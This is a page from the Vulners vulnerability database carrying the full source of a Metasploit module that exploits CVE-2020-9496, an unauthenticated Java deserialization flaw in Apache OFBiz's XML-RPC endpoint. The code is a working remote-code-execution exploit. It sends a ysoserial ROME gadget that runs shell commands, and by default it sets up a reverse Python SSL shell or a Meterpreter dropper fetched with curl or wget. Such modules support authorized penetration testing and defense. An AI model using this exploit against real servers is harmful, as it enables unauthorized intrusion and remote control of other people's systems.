Vulners
Lucene search
Apache OFBiz XML-RPC Java Deserialization Exploit
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | Apache OFBiz XML-RPC Java Deserialization Exploit | 13 Mar 202100:00 | – | zdt |
| ApacheOfBiz 17.12.01 - Remote Command Execution via Unsafe Deserialization of XMLRPC arguments | 4 Aug 202100:00 | – | zdt |
 | Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 30 Apr 202106:55 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 13 May 202113:28 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 7 May 202116:50 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 4 Aug 202106:48 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 15 Aug 202014:29 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 6 Jun 202110:32 | – | githubexploit |
 | CVE-2020-9496 | 15 Jul 202000:00 | – | attackerkb |
 | CVE-2020-9496 | 11 Mar 202118:53 | – | circl |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache OFBiz XML-RPC Java Deserialization',
'Description' => %q{
This module exploits a Java deserialization vulnerability in Apache
OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
versions prior to 17.12.04.
},
'Author' => [
'Alvaro Muñoz', # Discovery
'wvu' # Exploit
],
'References' => [
['CVE', '2020-9496'],
['URL', 'https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz'],
['URL', 'https://ofbiz.apache.org/release-notes-17.12.04.html'],
['URL', 'https://issues.apache.org/jira/browse/OFBIZ-11716']
],
'DisclosureDate' => '2020-07-13', # Vendor release note
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Payload' => {
'BadChars' => ' '
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
}
],
[
'Linux Dropper',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => %i[curl wget],
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8443),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end
def check
# Send an empty serialized object
res = send_request_xmlrpc('')
unless res
return CheckCode::Unknown('Target did not respond to check.')
end
if res.body.include?('Failed to read result object: null')
return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
end
CheckCode::Safe('Target cannot deserialize arbitrary data.')
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager(nospace: true)
end
end
def execute_command(cmd, _opts = {})
# XXX: Execute commands in a shell
cmd.prepend('sh -c ')
vprint_status("Executing command: #{cmd}")
res = send_request_xmlrpc(
# framework/webapp/lib/rome-0.9.jar
Msf::Util::JavaDeserialization.ysoserial_payload('ROME', cmd)
)
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
end
print_good("Successfully executed command: #{cmd}")
end
def send_request_xmlrpc(data)
# http://xmlrpc.com/
# https://ws.apache.org/xmlrpc/
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc'),
'ctype' => 'text/xml',
# HACK: Pretty-print XML
'data' => Nokogiri::XML(<<~XML, &:noblanks).to_xml
<?xml version="1.0"?>
<methodCall>
<methodName>#{rand_text_alphanumeric(8..42)}</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>#{rand_text_alphanumeric(8..42)}</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
XML
)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2020 00:00Current
0.6Low risk
Vulners AI Score0.6
CVSS 24.3
CVSS 3.16.1
EPSS0.93765